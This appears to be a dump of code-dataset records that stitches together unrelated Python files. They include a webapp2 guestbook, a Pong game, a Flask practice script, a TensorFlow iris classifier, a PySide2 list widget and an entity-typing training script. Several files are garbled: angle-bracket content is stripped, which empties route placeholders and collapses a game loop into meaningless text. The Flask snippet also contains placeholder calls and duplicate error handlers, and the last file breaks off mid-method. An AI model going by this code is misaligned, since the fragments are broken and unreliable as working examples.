TrajnoIzbrisiHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"trajno_izbrisi.html\", params=params)\n\n def post(self, guest_ID): #se ne izbrise zares\n guest = Guest.get_by_id(int(guest_ID))\n guest.key.delete()\n self.redirect_to(\"izbrisani\")\n\n\napp = webapp2.WSGIApplication([\n webapp2.Route('/', MainHandler),\n webapp2.Route('/vnos', VnosHandler),\n webapp2.Route('/seznam-gostov', SeznamGostovHandler, name = \"seznam-gostov\"),\n webapp2.Route('/guest/', PosamezniGostHandler),\n webapp2.Route('/guest//uredi', UrediMessageHandler),\n webapp2.Route('/guest//izbrisi', IzbrisiMessageHandler),\n webapp2.Route('/izbrisani', IzbrisaniHandler, name = \"izbrisani\"),\n webapp2.Route('/guest//obnovi', ObnoviHandler),\n webapp2.Route('/guest//trajno_izbrisi', TrajnoIzbrisiHandler),\n], debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"339821326","text":"#!/usr/bin/python\n#coding=utf-8\nfrom openpyxl import load_workbook, worksheet, workbook \nimport sys\n\n\ndef getWorkSheet( name ):\n\tarkusz = load_workbook( name )\n\tws = arkusz.get_active_sheet()\n\treturn ws\n\ndef getCells( ws ):\n\trows = []\n\tfor r in ws.rows:\n\t\tif r[1].value == None:\n\t\t\tcontinue\n\t\trows.append( { 'id' : r[0].value, 'val' : unicode( r[1].value ) } )\n\treturn rows\n\ndef getTreeKeywordCount( rows ):\n\tnw = []\n\tfor cell in rows:\n\t\tif 'BRAND EQUITY BENEFITS' in cell['val'] or 'COPY STRATEGY MESSAGE' in cell['val']:\n\t\t\tcell['ncount'] = 1\n\t\telse:\n\t\t\tcell['ncount'] = cell['val'].count( 'NET' ) + 
cell['val'].count( 'sub' ) + cell['val'].count( 'net' )\n\t\tnw.append( cell )\n\treturn nw\n\ndef getRowDepth( rows ):\n\tdepth = 0\n\tnw = []\n\tfor row in rows:\n\t\tif row['ncount'] != 0:\n\t\t\tdepth = row['ncount']\n\t\t\trow['depth'] = depth\n\t\t\tnw.append( row )\n\t\t\tcontinue\n\t\trow['depth'] = depth+1\n\t\tnw.append( row )\n\treturn nw\n\ndef buildTreeNode( rows, parent ):\n\tif len( rows ) == 0: \n\t\treturn\n\tdepth = rows[0]['depth']\n\tnowy = { 'id' : rows[0]['id'], 'val' : rows[0]['val'], 'sub' : [] }\n\tparent['sub'] += [ nowy ]\n\trows.pop(0)\n\twhile len( rows ) > 0 and rows[0]['depth'] > depth:\n\t\tbuildTreeNode( rows, nowy )\n\ndef buildTree( cells ):\n\troot = { 'id' : None, 'val' : 'root', 'sub' : [] }\n\twhile len( cells ) > 0:\n\t\tbuildTreeNode( cells, root )\n\treturn root\n\ndef showTreeAtLevel( tree, level ):\n\tif level == 0:\n\t\treturn\n\tout = tree['val'] if len( tree['val'] ) < 20 else tree['val'][:20] + '...'\n\tprint( ( 6 - level )*'\\t' + tree['id'] + ' ' + out )\n\tfor t in tree['sub']:\n\t\tshowTreeAtLevel( t, level-1)\n\ndef saveTree( root, ws, level ):\n\tif root['val'] != 'root':\n\t\tif root['id'] != None:\n\t\t\tws.cell( row = saveTree.c, column = level ).value = root['id']\n\t\t\tlevel += 1\n\t\tws.cell( row = saveTree.c, column = level ).value = root['val']\n\t\tsaveTree.c += 1\n\telse:\n\t\tlevel = -1\n\tfor node in root['sub']:\n\t\tsaveTree( node, ws, level+1 )\nsaveTree.c = 0\n\nws = getWorkSheet( sys.argv[1] )\ncells = getCells( ws )\ncells = getTreeKeywordCount( cells )\ncells = getRowDepth( cells )\nroot = buildTree( cells )\ngotowe = ws.parent.create_sheet( title = 'gotowe' )\nsaveTree( root, gotowe, 0 )\ngotowe.parent.save( 'gotowe.xlsx' )\n","sub_path":"excel_drzewo2.py","file_name":"excel_drzewo2.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"425474747","text":"from random import randint\ncomputer_wins=0\nplayer_wins=0\nnum=3\nwhile player_winscomputer_wins:\n\tprint(\"......youuuu wonnnn....\")\nelif player_wins==computer_wins:\n\tprint(\"..IT'S A TIE..\")\nelse:\n\tprint(\"....sorry youuuu loose...\")","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"494863336","text":"from bfex.components.data_pipeline.tasks import Task\nfrom bfex.common.exceptions import WorkflowTaskArgumentException, ScraperException, WorkflowException \n\nclass Workflow(object):\n \"\"\"A workflow is a series of tasks to be run in sequence.\n\n Each task is verified prior to running, by calling the is_requirement_satisfied method of the task. It will only\n be run if that method returns true. The result of each step is stored in last_result, and can be accessed if needed.\n \"\"\"\n\n def __init__(self, tasks, init_data=None):\n \"\"\"Creates a new workflow with the passed in series of tasks.\n\n :param list tasks: A list of Task class references to be instantiated and run.\n :param init_data: Any initialization data that should be fed into the first task.\n :exception ValueError: If the tasks list is empty\n :exception TypeError: If any of the class references in tasks are not a subclass of Task\n \"\"\"\n self.tasks = tasks\n self.steps = len(tasks)\n self.current_step = 0\n self.last_result = init_data\n\n \"\"\"TODO: It would be cool to support dynamic loading of classes at runtime. 
So we could specify a workflow\n # as a list of string names of the tasks. You could define new workflows from an api that way.\n \"\"\"\n if self.steps < 1:\n raise ValueError(\"A workflow must contain at least one step.\")\n\n for task in tasks:\n if not issubclass(task, Task):\n raise TypeError(\"A workflow must be made up of only of references to Task classes.\")\n\n def get_current_task(self):\n \"\"\"Returns the next task to be run.\"\"\"\n return self.tasks[self.current_step]\n\n def get_last_result(self):\n \"\"\"Returns the result of the previously ran task.\"\"\"\n return self.last_result\n\n def run_next(self):\n \"\"\"Runs the next task in the workflow.\n\n :exception WorkflowTaskArgumentException: If a task receives unsatisfactory data.\n :returns False if there are no more steps to be run, True if the step succeeds.\n \"\"\"\n if self.current_step >= self.steps:\n return False\n\n \"\"\"Fetch the class of the next task, and instantiate it\"\"\"\n current_task = self.get_current_task()() \n \n if current_task.is_requirement_satisfied(self.last_result):\n try:\n result = current_task.run(self.last_result)\n except ScraperException:\n return False\n\n self.last_result = result\n self.current_step += 1\n else:\n raise WorkflowException(\"{} received an unsatisfactory argument - {}\"\n .format(current_task.task_name, self.last_result))\n \n return True\n\n def run(self):\n \"\"\"Runs the entire workflow, from the current step to finish.\n\n :returns The result of the final task.\n \"\"\"\n is_finished = False\n\n while not is_finished:\n is_finished = not self.run_next()\n\n return self.last_result\n\n\nif __name__ == \"__main__\":\n \"\"\"Testing Purposes\"\"\"\n from bfex.components.data_pipeline.tasks import *\n from elasticsearch_dsl import connections\n connections.create_connection()\n Keywords.init()\n Document.init()\n\n search = Faculty.search()\n allFaculty = [faculty for faculty in search.scan()]\n for faculty in allFaculty:\n\n if isinstance(faculty, str):\n faculty_name = faculty\n else:\n faculty_name = faculty.name\n print(faculty)\n\n tasks = [FacultyPageScrape, UpdateFacultyFromScrape, ResearchIdPageScrape, GoogleScholarPageScrape, GetKeywordsFromScrape, UpdateKeywordsFromGenerator]\n workflow_manager = Workflow(tasks, faculty_name)\n workflow_manager.run()\n","sub_path":"web/bfex/components/data_pipeline/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"416327977","text":"from ProductFactory import ProductFactory\nfrom DancingSkeleton import DancingSkeleton\nfrom RCSpider import RCSpider\nfrom PumpkinCaramelToffee import PumpkinCaramelToffee\n\n\nclass HalloweenProductFactory(ProductFactory):\n\n def create_toy(self, order):\n product_id = order.product_id\n # collects details of orders\n keys = ['has_batteries', 'min_age', 'name', 'desc', 'speed',\n 'jump_height', 'has_glow', 'type', 'spider_type']\n properties = {key: value for key, value in order.details.items() if key in keys}\n\n order.details['error'] = self.toy_exception(properties)\n if order.details['error'] != \"false\":\n order.details['corrupted'] = True\n\n return RCSpider(product_id, properties=properties)\n\n def create_stuffed_animal(self, order):\n product_id = order.product_id\n # collects details of orders\n keys = ['stuffing', 'size', 'fabric', 'name', 'desc',\n 'has_glow', 'jump_height']\n properties = {key: value for key, value in order.details.items() if key 
in keys}\n\n order.details['error'] = self.stuffed_animal_exception(properties)\n if order.details['error'] != \"false\":\n order.details['corrupted'] = True\n\n return DancingSkeleton(product_id, properties=properties)\n\n def create_candy(self, order):\n product_id = order.product_id\n # collects details of orders\n keys = ['nuts', 'lactose', 'name', 'desc', 'variety']\n properties = {key: value for key, value in order.details.items() if key in keys}\n\n order.details['error'] = self.candy_exception(properties)\n if order.details['error'] != \"false\":\n order.details['corrupted'] = True\n\n return PumpkinCaramelToffee(product_id, properties=properties)\n\n def toy_exception(self, properties):\n if properties['min_age'] < 0:\n return \"Age must be greater than 0\"\n if properties['has_glow'] != 'Y' and properties['has_glow'] != 'N':\n return \"has_glow must be Y or N\"\n if properties['spider_type'] != 'Tarantula' and properties['spider_type'] != 'Wolf Spider':\n return \"Spider type must be Tarantula or Wolf Spider\"\n\n return \"false\"\n\n def stuffed_animal_exception(self, properties):\n if properties['stuffing'] != 'Polyester Fibrefill' and properties['stuffing'] != 'Wool':\n return \"Stuffing can only be Polyester Fiberfill or Wool\"\n\n if properties['size'] != 'S' and properties['size'] != 'M' and properties['size'] != 'L':\n return \"size must be either S, M, or L\"\n\n if properties['fabric'] != 'Linen' and properties['fabric'] != 'Cotton' and \\\n properties['fabric'] != 'Acrylic':\n return \"fabric must be either Linen, Cotton, or Acrylic\"\n\n if properties['has_glow'] != 'Y' and properties['has_glow'] != 'N':\n return \"has_glow must be Y or N\"\n\n return \"false\"\n\n def candy_exception(self, properties):\n if properties['variety'] != 'Sea Salt' and properties['variety'] != 'Regular':\n return \"variety must be Sea Salt or Regular\"\n\n return \"false\"\n","sub_path":"Assignments/Assignment2/HalloweenProductFactory.py","file_name":"HalloweenProductFactory.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"91107592","text":"\nimport turtle\nwn=turtle.Screen()\nwn.title(\"Pong by @jalshivam\")\nwn.bgcolor(\"black\")\nwn.setup(height=600,width=800)\nwn.tracer(0)\n\n#score\nscore_a=0\nscore_b=0\n\n\n\n#PADDLE A:\npaddle_a=turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=5, stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-300,0)\n\n#PADDLE B:\npaddle_b=turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=5, stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(300,0)\n\n#BALL:\nball=turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"white\")\nball.penup()\nball.goto(0,0)\n\n#moving the ball\n#differentiate the ball movement into two parts namely\n#the x axis movement and the y axis movement\nball.dx=.3\nball.dy=.3\n\n\n# Pen\npen=turtle.Turtle()\npen.speed(0)\npen.color(\"white\")\npen.penup()\npen.hideturtle()\npen.goto(0,260)\npen.write(\"Player A: 0 Player B: 0\",align=\"center\" ,font=(\"Courier\",24 ,\"normal\") ) \n\n\n\n\n#Functions\n#to move paddle_A upwards\ndef paddle_a_up():\n y=paddle_a.ycor()\n y=y+20\n paddle_a.sety(y)\n\n\n#to move paddle a downwards\ndef paddle_a_down():\n y=paddle_a.ycor()\n y=y-20\n paddle_a.sety(y)\n\n#to move paddle_b upwards\ndef paddle_b_up():\n y=paddle_b.ycor()\n y=y+20\n 
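# apply the updated y so paddle B moves up, mirroring paddle_a_up\n 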
paddle_b.sety(y)\n\n\n#to move paddle b downwards\ndef paddle_b_down():\n y=paddle_b.ycor()\n y=y-20\n paddle_b.sety(y)\n \n \n \n\n\n#Keyboard binding\nwn.listen()\nwn.onkey(paddle_a_up,\"w\")\nwn.onkey(paddle_a_down,\"s\")\nwn.onkey(paddle_b_up,\"Up\")\nwn.onkey(paddle_b_down,\"Down\")\n\n\n\n\n\n#MAIN FILE FOR GAME LOOP\nwhile True:\n wn.update()\n\n #Move the ball\n ball.setx(ball.xcor() + ball.dx) \n ball.sety(ball.ycor() + ball.dy)\n\n #Border Checking\n if ball.ycor()>300:\n ball.sety(300)\n ball.dy = ball.dy*-1\n\n if ball.ycor()<-300:\n ball.sety(-300)\n ball.dy = ball.dy*-1\n \n if ball.xcor()>400:\n ball.goto(0,0)\n ball.dx*=-1 \n score_a=score_a + 1\n pen.clear()\n pen.write(\"Player A: {} Player B: {}\".format(score_a,score_b),align=\"center\" ,font=(\"Courier\",24 ,\"normal\") ) \n\n if ball.xcor()<-400:\n ball.goto(0,0)\n ball.dx*=-1 # reverse horizontal direction after the reset, mirroring the branch above\n score_b=score_b + 1 \n pen.clear()\n pen.write(\"Player A: {} Player B: {}\".format(score_a,score_b),align=\"center\" ,font=(\"Courier\",24 ,\"normal\") ) \n\n\n #Collisions\n if ball.xcor()>300 and ball.ycor() < paddle_b.ycor() + 50 and ball.ycor() > paddle_b.ycor() - 50: \n ball.dx*=-1\n if ball.xcor()<-300 and ball.ycor() < paddle_a.ycor() + 50 and ball.ycor() > paddle_a.ycor() - 50: \n ball.dx *= -1\n\n","sub_path":"pong_game.py","file_name":"pong_game.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"548306406","text":"from tables.base_table_class import Base_Table\n\nclass RELATIONSHIP_CHILDREN_Table(Base_Table):\n\t\"The definition of the Relationship Children Table in the database\"\n\n\ttable_name = \"RELATIONSHIP_CHILDREN\"\n\n\tdef __init__(self) :\n\t\tself.table_name = RELATIONSHIP_CHILDREN_Table.table_name\n\t\tself.columns = Base_Table.columns + [\"Estimate: Total\",\n\t\t\t\t\t\"Estimate: Own child - Biological child\",\n\t\t \t\t\t\"Estimate: Own child - Adopted child\",\n\t\t\t\t\t\"Estimate: Own child - Stepchild\",\n\t\t\t\t\t\"Estimate: Grandchild\",\n\t\t\t\t\t\"Estimate: Other relatives\",\n\t\t\t\t\t\"Estimate: Foster child or Other Unrelated child\"]\n\t\tself.table_extra_meta_data = Base_Table.table_extra_meta_data\n\n\t\tself.initalize()\n\n\tdef getInsertQueryForCSV(self, csvFile, fromYear, toYear) :\n\t\tskipCount = 0\n\t\tinsertDataQuery = \"\"\"REPLACE INTO `{0}` VALUES \"\"\".format(self.table_name)\n\t\tfor line in csvFile:\n\t\t\trow = line.split(\",\")\n\t\t\tif (skipCount < Base_Table.num_of_rows_to_leave) :\n\t\t\t\tskipCount += 1\n\t\t\t\tcontinue\n\n\t\t\tdefaultQuery = self.getIDAndYearQueryForRow(row, fromYear, toYear)\n\t\t\tdataQuery = \"%d, %d, %d, %d, %d, %d, %d\" %(int(row[3]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[5]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[6]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[7]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[8]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[9]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tint(row[10]))\n\t\t\tinsertDataQuery += \"(\" + defaultQuery + dataQuery + \"),\"\n\n\t\tinsertDataQuery = insertDataQuery[:-1]\n\t\tinsertDataQuery += \";\"\n\t\treturn insertDataQuery\n","sub_path":"wca_server/tables/demographics/relationship_children_table.py","file_name":"relationship_children_table.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"654377921","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n# set up x and y\nx = np.linspace(-1,1,50)\ny = 2 * x + 
1\n\nprint(x)\nprint(y)\n\n# open the figure window\nplt.figure()\n# hand the x, y data to plt to draw the plot\nplt.plot(x,y)\n# show the figure\nplt.show()\n\n# to draw a straight line, just give the X, Y coordinates of its points\nx0 = 1\ny0 = 2 * x0 + 1\nplt.figure(figsize=(8,5))\nplt.xlim(-1,10)\nplt.ylim(-1,10)\nplt.plot([x0, x0,], [0, y0,], 'k--', linewidth=2.5)\nplt.plot(x,y)\nplt.show()\n","sub_path":"src/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"211300073","text":"#%%Logging and Monitoring Basics with tf.contrib.learn \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n# Data sets\nIRIS_TRAINING =\"/home/keetsky/Desktop/tensorflow_learn/iris_training.csv\"\nIRIS_TEST = \"/home/keetsky/Desktop/tensorflow_learn/iris_test.csv\"\n\n\n # Load datasets.\ntraining_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TRAINING, target_dtype=np.int, features_dtype=np.float32)\ntest_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TEST, target_dtype=np.int, features_dtype=np.float32)\n\n # Specify that all features have real-value data\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=4)]\n\nvalidation_monitor = tf.contrib.learn.monitors.ValidationMonitor(test_set.data,\n test_set.target,\n every_n_steps=50)\n\n\n # Build 3 layer DNN with 10, 20, 10 units respectively.\nclassifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns,\n hidden_units=[10, 20, 10],\n n_classes=3,\n model_dir=\"/tmp/iris_model\",\n config=tf.contrib.learn.RunConfig(save_checkpoints_secs=1))\n\n # Fit model.\nclassifier.fit(x=training_set.data,\n y=training_set.target,\n steps=2000,\n monitors=[validation_monitor])\n\n # Evaluate accuracy.\naccuracy_score = classifier.evaluate(x=test_set.data,\n y=test_set.target)[\"accuracy\"]\nprint('Accuracy: {0:f}'.format(accuracy_score))\n\n # Classify two new flower samples.\nnew_samples = np.array(\n [[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)\ny = list(classifier.predict(new_samples, as_iterable=True))\nprint('Predictions: {}'.format(str(y)))\n","sub_path":"官方教程程序/8 Logging and Monitoring Basics with tf_contrib_learn/Logging and Monitoring Basics with tf_contrib_learn .py","file_name":"Logging and Monitoring Basics with tf_contrib_learn .py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"376904616","text":"import sys\nimport random\nfrom PySide2.QtUiTools import QUiLoader\nfrom PySide2.QtWidgets import QApplication\nfrom PySide2.QtCore import QFile, QIODevice\n\ndef add_item():\n window.main_list.addItem(f\"test {random.randint(0, 100)}\")\n\ndef remove_item():\n selected_items = window.main_list.selectedItems()\n for item in selected_items:\n selection = window.main_list.takeItem(window.main_list.row(item))\n\ndef clear_list():\n window.main_list.clear()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n ui_file_name = \"mywidget.ui\"\n ui_file = QFile(ui_file_name)\n if not ui_file.open(QIODevice.ReadOnly):\n print(\"Cannot open {}: {}\".format(ui_file_name, ui_file.errorString()))\n sys.exit(-1)\n loader = QUiLoader()\n window = loader.load(ui_file)\n ui_file.close()\n\n window.button_add.clicked.connect(add_item)\n window.button_remove.clicked.connect(remove_item)\n 
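# Clear empties the whole QListWidget, unlike remove_item, which only drops the selected rows\n 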
window.button_clear.clicked.connect(clear_list)\n\n if not window:\n print(loader.errorString())\n sys.exit(-1)\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"examples/02_widget_ui/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"651945476","text":"#! /usr/bin/python3\nfrom PIL import Image\nimport sys\n\nisLandscape = lambda x: max(x)==x[0]\n\ndef getImageFromWeb(url):\n '''\n '''\n \ndef getImageFromDisk(file):\n try:\n im = Image.open(file)\n except:\n return \"Error opening image...\"\n else:\n print(\"Opened image {}\".format(file))\n return process(im, file)\n \ndef process(im, file=\"output.jpg\"):\n if isLandscape(im.size) == False:\n return \"Please provide landscape image. Only they are supported as of now\"\n else:\n new_im = Image.new(im.mode, (max(im.size), max(im.size)), color=0)\n new_im.paste(im, box=(0, (im.size[0]-im.size[1])//2))\n outfile = '{}_i.jpg'.format(file[:-4])\n new_im.save(outfile)\n return \"Image saved as {}\".format(outfile)\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print (\"Please provide input file!\")\n else:\n res = getImageFromDisk(sys.argv[1])\n print(res)\n \n \n","sub_path":"whatsapp_dp.py","file_name":"whatsapp_dp.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"210938138","text":"from flask import Flask # WSGI(Web Server Gateway Interface) : interface definition rules\r\nfrom flask import url_for\r\nfrom flask import request\r\nfrom flask import render_template\r\nfrom flask import Markup\r\n# from werkzeug import secure_filename\r\nfrom flask import make_response\r\nfrom flask import abort, redirect\r\nfrom flask import session, escape\r\n\r\nimport os\r\n\r\napp = Flask(__name__)\r\napp.debug = True\r\n\r\n# #session\r\n# @app.route('/')\r\n# def index():\r\n# if 'username' in session:\r\n# return 'Logged in as %s' %escape(session['username'])\r\n# return 'U r not logged in'\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if request.method == 'POST':\r\n session['username'] = request.form['username']\r\n return redirect(url_for('index'))\r\n return 0\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n session.pop('username', None)\r\n return redirect(url_for('index'))\r\napp.secret_key = os.urandom(24)\r\n\r\n#cookies\r\n@app.route('/')\r\ndef hello_world():\r\n #read a cookie\r\n username = request.cookies.get('username')\r\n #store a cookie\r\n resp = make_response(render_template(...))\r\n resp.set_cookie('username', 'the username')\r\n return 'Hello World!'+Markup('<strong>Hello %s!</strong>') % '<blink>hacker</blink>'+Markup.escape('<blink>hacker</blink>')+Markup('<em>Marked up</em> » HTML').striptags()\r\n\r\n# #redirection\r\n# @app.route('/')\r\n# def index():\r\n# return redirect(url_for('login'))\r\n\r\n# #abort early\r\n# @app.route('/login')\r\n# def login():\r\n# abort(401)\r\n# this_is_never_executed()\r\n\r\n#error pages\r\n@app.errorhandler(404)\r\ndef page_not_found(error):\r\n return render_template('page_not_found.html'), 404\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n resp = make_response(render_template('error.html'), 404)\r\n resp.headers['X-Something'] = 'A value'\r\n return resp\r\n\r\n#receiving values via <> placeholders\r\n@app.route('/user/<username>/')\r\ndef show_user_profile(username):\r\n return 'User %s' %username\r\n@app.route('/post/<int:post_id>/')\r\ndef show_post(post_id):\r\n return 'Post %d' %post_id\r\n\r\n# #login\r\n# @app.route('/login', methods=['GET', 'POST'])\r\n# def login():\r\n# 
error = None\r\n# searchword = request.args.get('key', '')\r\n# if request.method == 'POST':\r\n# # print('POST')\r\n# # return 'POST'\r\n# if valid_login(request.form['username'],\r\n# request.form['password']):\r\n# return log_the_user_in(request.form['username'])\r\n# else:\r\n# # print('GET')\r\n# # return 'GET'\r\n# error = 'Invalid username/password'\r\n#\r\n# return render_template('login.html', error=error)\r\n\r\n#files\r\n@app.route('/upload', methods=['GET', 'POST'])\r\ndef upload_file():\r\n if request.method == 'POST':\r\n f = request.files['the_file']\r\n f.save('/var/www/uploads/uploaded_file.txt')\r\n # f.save('/var/www/uploads/' + secure_filename(f.filename)\r\n\r\n#passing values to templates\r\n@app.route('/hello/')\r\n@app.route('/hello/<name>')\r\ndef hello(name=None):\r\n return render_template('hello.html', name=name)\r\n\r\n#handled like a real request, to get the URL of a routed function\r\nwith app.test_request_context():\r\n print(url_for('hello_world'))\r\n print(url_for('show_user_profile', username='Jhon'))\r\n print(url_for('login', next='/'))\r\n print(url_for('static', filename='style.css'))\r\n\r\n#ToDO ?\r\nwith app.test_request_context('/hello', method='POST'):\r\n assert request.path == '/hello'\r\n assert request.method == 'POST'\r\n\r\n#ToDo ?\r\n# with app.request_context(environ):\r\n# assert request.method == 'POST'\r\n\r\n#TODO ? message flashing?\r\n\r\n#logging\r\napp.logger.debug('A value for debugging')\r\napp.logger.warning('A warning occurred (%d apples)', 42)\r\napp.logger.error('An error occurred')\r\n\r\n#hooking in middleware\r\nfrom werkzeug.contrib.fixers import LighttpdCGIRootFix\r\napp.wsgi_app = LighttpdCGIRootFix(app.wsgi_app)\r\n\r\n#run\r\nif __name__ == '__main__':\r\n app.run()\r\n # app.run(host='0.0.0.0')","sub_path":"practice/run_fast.py","file_name":"run_fast.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"279953039","text":"from torch.nn.modules.loss import BCELoss\nfrom torch.utils.data.dataloader import DataLoader\nfrom adapter_entity_typing.utils import prepare_entity_typing_dataset\nfrom adapter_entity_typing.network import get_model, add_classifier, PARAMETERS\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Adam\nimport torch\nimport numpy as np\nimport random\nimport os\nfrom tqdm import tqdm\nfrom adapter_entity_typing.network_classes.classifiers import adapterPLWrapper, EarlyStoppingWithColdStart\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n\nif torch.cuda.is_available():\n print('gpu on')\n # torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n\ndef declare_callbacks_and_trainer(model):\n callbacks = [] \n experiment_name = model.configuration(\"ExperimentName\")\n early_stopping_patience = model.configuration(\"Patience\", \"train\")\n epochs = model.configuration(\"MaxEpochs\", \"train\")\n cold_start = model.configuration(\"ColdStart\", \"train\")\n limit_val_batches = model.configuration(\"LimitValBatches\", \"train\")\n early_stop_callback = EarlyStoppingWithColdStart(\n monitor='example_macro/macro_f1',\n min_delta=0.00,\n patience=early_stopping_patience,\n verbose=False,\n mode='max',\n strict=True,\n cold_start_epochs=cold_start)\n callbacks.append(early_stop_callback)\n checkpoint_callback = ModelCheckpoint(monitor='example_macro/macro_f1',\n dirpath=model.configuration(\"PathModel\", \"train\"),\n filename=experiment_name,\n mode='max',\n save_last=False)\n 
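# register the checkpoint callback alongside early stopping so the best macro-F1 weights are kept\n 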
callbacks.append(checkpoint_callback)\n logger = TensorBoardLogger(model.configuration(\"LightningPath\", \"train\"),\n name=experiment_name,\n default_hp_metric=False)\n\n trainer = Trainer(callbacks=callbacks,\n logger=logger,\n gpus = 1, \n max_epochs=epochs,\n limit_train_batches=300,\n limit_val_batches=limit_val_batches,\n precision = 16)\n return trainer\n\n\n\ndef get_pretrained_name(base_name, i):\n return \"{}-v{}.ckpt\".format(base_name, i) if i else \"{}.ckpt\".format(base_name)\n\n \ndef get_random_seed():\n i = 0\n while True:\n yield i if i else 236451 # https://www.wikidata.org/wiki/Q75179705\n i += 1\n\n\ndef train(experiment):\n print(\"Starting \" + experiment + \"\\n\\n\")\n for i, s in enumerate(get_random_seed(), 1):\n torch.manual_seed(s)\n torch.cuda.manual_seed(s)\n np.random.seed(s)\n random.seed(s)\n torch.backends.cudnn.enabled = False\n torch.backends.cudnn.deterministic = True\n torch.cuda.empty_cache()\n \n model = get_model(experiment)\n \n try:\n pretrained_name = model.configuration(\"Traineds\", \"train\")[i - 1]\n except IndexError:\n break\n print(\"\\n\\nTraining {} for the {} time\".format(experiment, i))\n if os.path.isfile(pretrained_name):\n print(\"Skipping\")\n continue\n\n # load data and initialize classifier & dataloaders\n train_dataset, label2id = prepare_entity_typing_dataset(model, \"train\")\n dev_dataset, label2id = prepare_entity_typing_dataset(model, \"dev\", label2id)\n add_classifier(model = model, labels = label2id)\n\n train_dataset.label_number = len(label2id)\n\n batch_size = model.configuration('BatchSize')\n train_loader = DataLoader(train_dataset, batch_size = batch_size, shuffle = True, num_workers=20, pin_memory = True)\n dev_loader = DataLoader(dev_dataset, batch_size = batch_size, num_workers=20, shuffle = True, pin_memory = True)\n\n # start training :D\n id2label = {v: k for k,v in label2id.items()}\n pl_wrapper = adapterPLWrapper(model, id2label)\n \n trainer = declare_callbacks_and_trainer(model)\n trainer.fit(pl_wrapper, train_loader, dev_loader)\n print(\"Saving on \" + pretrained_name)\n\n # if you have enough, stop it\n if i - 1 >= model.configuration(\"n\", \"train\"):\n break\n\n\nif __name__ == \"__main__\":\n import sys\n train(sys.argv[1])\n","sub_path":"adapter_entity_typing/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"145203565","text":"import os\nfrom geopy.geocoders import Nominatim, GoogleV3\nimport googlemaps\nfrom googlemaps import places\n\n\nclass MetaDataFromCoordinates:\n def __init__(self, lat, long):\n self.lat = lat\n self.long = long\n\n def get_name(self):\n gm_client = googlemaps.Client(os.environ['api_google_key'])\n gmap = places.places_nearby(client=gm_client, location={'lat': self.lat, 'lng': self.long}, radius=25)\n res = gmap['results']\n for i in range(len(res)):\n if 'gas_station' in res[i]['types']:\n name = res[i]['name']\n return name\n\n def get_address(self):\n geo = 